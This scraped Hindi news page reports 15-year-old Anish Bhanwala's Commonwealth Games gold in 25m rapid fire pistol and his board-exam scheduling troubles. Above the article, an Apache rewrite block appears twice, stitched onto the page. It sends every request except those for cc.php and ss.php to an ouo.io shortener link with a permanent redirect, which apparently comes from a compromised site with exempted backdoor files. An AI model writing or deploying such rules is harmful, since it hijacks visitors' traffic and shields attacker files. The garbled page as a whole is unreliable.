
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 461
Previous Nextगोल्डकोस्ट। ऑस्ट्रेलिया के गोल्ड कोस्ट में खेले जा रहे कॉमनवेल्थ गेम्स में निशानेबाजी में 15 साल के अनीश भनवाला गोल्ड मेडल जीतने वाले सबसे युवा भारतीय बन गए हैं। अनीश ने 30 अंक हासिल कर 25 मीटर रैपिड फायर पिस्टल में गोल्ड मेडल जीता। उन्होंने 2014 में ग्लाग्सो में आयोजित कॉमनवेल्थ गेम्स में ऑस्ट्रेलिया के डेविड चापमैन द्वारा बनाए रिकॉर्ड को तोड़ दिया है। अनीश टीम के सबसे युवा खिलाड़ी हैं और उन्होंने पहली बार कॉमनवेल्थ गेम्स हिस्सा लिया। भले ही अनीश के पास गगन नारंग, जीतू राय, संजीव राजपूत जितना अनुभव नहीं रहा हो, लेकिन अनीश हमेशा अपने फॉर्म में रहे। हाल ही में उन्होंने आईएसएसएफ जूनियर विश्व कप में स्वर्ण पदक अपने नाम किया था। 25 मीटर रैपिड फायर इवेंट में देश का प्रतिनिधित्व करने वाले अनीश कॉमनवेल्थ में आने से पहले अपने बोर्ड एग्जाम को लेकर चिंतित थे। इंटरनेशनल कैलेंडर और एग्जाम शेड्यूल एक होने के कारण वे परेशान हो गए थे। कॉमनवेल्थ से पहले उन्हें 19 से 29 मार्च तक होने वाले जूनियर विश्व कप में भाग लेना था लेकिन उन्हें टीम में शामिल नहीं किया गया नहीं तो वे किसी भी पेपर में बैठ नहीं पाते। उन्होंने सीबीएसई को पत्र लिखकर निवेदन किया कि बोर्ड समय निकलने के बाद भी पेपर देने की अनुमति दे जिसके बाद बोर्ड ने एक पेपर के लिए उन्हें अनुमति दे दी।
पिछले साल 25 मीटर रैपिड फायर पिस्टल में अनीश का नाम उभर कर सामने आया। नवंबर में अनीश ने कॉमनवेल्थ चैंपियनशिप में ओलिंपियन गुरप्रीत सिंह को काफी पीछे छोड़ते हुए सिल्वर मेडल अपने नाम किया था। वहीं जून में वे विश्व रिकॉर्ड के साथ जूनियर वर्ल्ड चैंपियन बने थे। अनीश ने चैंपियनशिप के पहले दिन 579 शॉट्स के साथ वर्ल्ड रिकॉर्ड बनाने के साथ ही गोल्ड जीता था।